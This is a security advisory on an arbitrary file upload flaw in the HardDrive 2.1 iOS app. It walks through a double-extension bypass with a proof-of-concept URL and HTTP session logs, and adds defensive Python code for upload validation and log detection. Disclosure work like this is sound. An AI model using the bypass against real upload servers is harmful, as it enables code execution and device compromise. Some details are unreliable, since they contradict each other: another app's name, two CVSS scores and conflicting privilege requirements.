# Title: HardDrive 2.1 for iOS - Arbitrary File Upload
# Author: Vulnerability Laboratory
# Date: 2020-04-30
# Software: https://apps.apple.com/ch/app/harddrive/id383226784
# CVE: N/A

Document Title:
===============
HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2221


Common Vulnerability Scoring System:
====================================
7.4


Product & Service Introduction:
===============================
Store+Organize+Edit+Protect+Import+Download+View+Share your files right
from your iPhone! Transform your iPhone/iPod touch into a real HardDrive
with no extra cable or software.

(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )


Affected Product(s):
====================
Sebastien BUET
HardDrive v2.1 - Apple iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-29: Public Disclosure (Vulnerability Laboratory)


Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the
official Air Sender v1.0.2 iOS mobile application.
The web vulnerability allows remote attackers to upload arbitrary files
to compromise, for example, the file system of a service.

The arbitrary upload vulnerability is located within the web-server
configuration when using the upload module.
Remote attackers are able to bypass the local web-server configuration
by uploading malicious webshells. Attackers are able to inject their own
files with malicious `filen` values in the `upload` POST method request
to compromise the mobile web-application. The application does not
perform checks for multiple file extensions. This allows an attacker to
upload, for example, a html.js.png file. After the upload, the attacker
requests the original url source with the uploaded file and removes the
unwanted extension to execute the code in the unprotected web-frontend.

The security risk of the vulnerability is estimated as high with a
common vulnerability scoring system count of 7.0.
Exploitation of the web vulnerability requires a low privilege ftp
application user account and no user interaction.
Successful exploitation of the arbitrary file upload web vulnerability
results in application or device compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] ./upload

Vulnerable File(s):
[+] file


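One way to close the multiple-extension gap described above, as an added example (not code from the advisory or from the HardDrive application): a Python upload check that refuses names such as exploit.html.js.png, compares the leading bytes with the claimed type, and stores the file under a server-generated name. The allowlist, the function names and the chosen response headers are assumptions of this example.

```python
import re
import secrets

# Assumed policy for this example: extension -> (Content-Type, leading magic bytes).
ALLOWED = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "pdf": ("application/pdf", b"%PDF-"),
}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


class RejectedUpload(ValueError):
    """Raised when an upload fails the name or content checks."""


def validate_upload(raw_name, head):
    """Return (stored_name, content_type) for an accepted upload.

    raw_name is the client-supplied file name, head the first bytes of the body.
    """
    # Drop any client-supplied directory part (both separator styles).
    name = raw_name.replace("\\", "/").rsplit("/", 1)[-1]
    parts = name.split(".")
    # Require exactly "stem.ext": "exploit.html.js.png" splits into four parts
    # and is refused, as are dotfiles and names with no extension.
    if len(parts) != 2 or not SAFE_STEM.fullmatch(parts[0]):
        raise RejectedUpload(f"unacceptable file name: {raw_name!r}")
    ext = parts[1].lower()
    if ext not in ALLOWED:
        raise RejectedUpload(f"extension not allowed: {ext!r}")
    content_type, magic = ALLOWED[ext]
    # The body must start like the type its extension claims.
    if not head.startswith(magic):
        raise RejectedUpload(f"content does not match .{ext}")
    # Server-generated name: the client never chooses the path it is served from.
    return f"{secrets.token_hex(8)}.{ext}", content_type


def response_headers(content_type):
    """Headers that keep a browser from rendering an upload as active content."""
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
    }
```
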
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote
attackers without user interaction or privileged user accounts.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


PoC: Vulnerable Source (File Dir Listing Index)
<tr><td width="100px" valign="middle" align="left"><img src="exploit.html"></td><td width="300px" valign="middle" align="left">
<a href="exploit.html.js">exploit.html.js</a></td> <td width="454px" valign="middle" align="left">
<em valign="middle" align="center">size: 256.7 Kb


PoC: Exploitation
http://localhost:50071/exploit.html.js


--- PoC Session Logs [POST] --- (file)
http://localhost:50071/
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9331569428946906291010349387
Content-Length: 263181
Origin: http://localhost:50071
Connection: keep-alive
Referer: http://localhost:50071/
file=exploit.html.js.png&button=Submit
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 381654
-
http://localhost:50071/exploit.html.js
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
-
http://localhost:50071/exploit.html
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 366735


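For detection, the pattern in the session log above (an upload followed by requests for the same name with trailing extensions removed) can be matched in web-server logs. This is an added example, not part of the original advisory; the event tuple format and the function names are assumptions, and the sample events are constructed to mirror the log.

```python
from urllib.parse import unquote, urlsplit


def truncated_forms(upload_name):
    """Names obtained by stripping one or more trailing extensions.

    "exploit.html.js.png" -> {"exploit.html.js", "exploit.html"}; the bare
    stem is left out, and a single-extension name yields nothing.
    """
    parts = upload_name.split(".")
    return {".".join(parts[:i]) for i in range(2, len(parts))}


def flag_stripped_requests(events):
    """Flag GETs that hit a truncated form of an earlier upload.

    events: (method, url, uploaded_name_or_None) tuples in time order
    (assumed format). Returns a list of (url, original_upload_name).
    """
    watch = {}  # truncated name -> upload it was derived from
    hits = []
    for method, url, upload in events:
        if method == "POST" and upload:
            for short in truncated_forms(upload):
                watch[short] = upload
        elif method == "GET":
            # Compare on the decoded last path segment only.
            name = unquote(urlsplit(url).path).rsplit("/", 1)[-1]
            if name in watch:
                hits.append((url, watch[name]))
    return hits


# Constructed events: the first three mirror the session log, the last two
# are an ordinary upload and download that must not be flagged.
EVENTS = [
    ("POST", "http://localhost:50071/", "exploit.html.js.png"),
    ("GET", "http://localhost:50071/exploit.html.js", None),
    ("GET", "http://localhost:50071/exploit.html", None),
    ("POST", "http://localhost:50071/", "holiday.png"),
    ("GET", "http://localhost:50071/holiday.png", None),
]

if __name__ == "__main__":
    for url, origin in flag_stripped_requests(EVENTS):
        print(f"suspicious: {url} (derived from upload {origin})")
```
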
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


--
VULNERABILITY LABORATORY - RESEARCH TEAM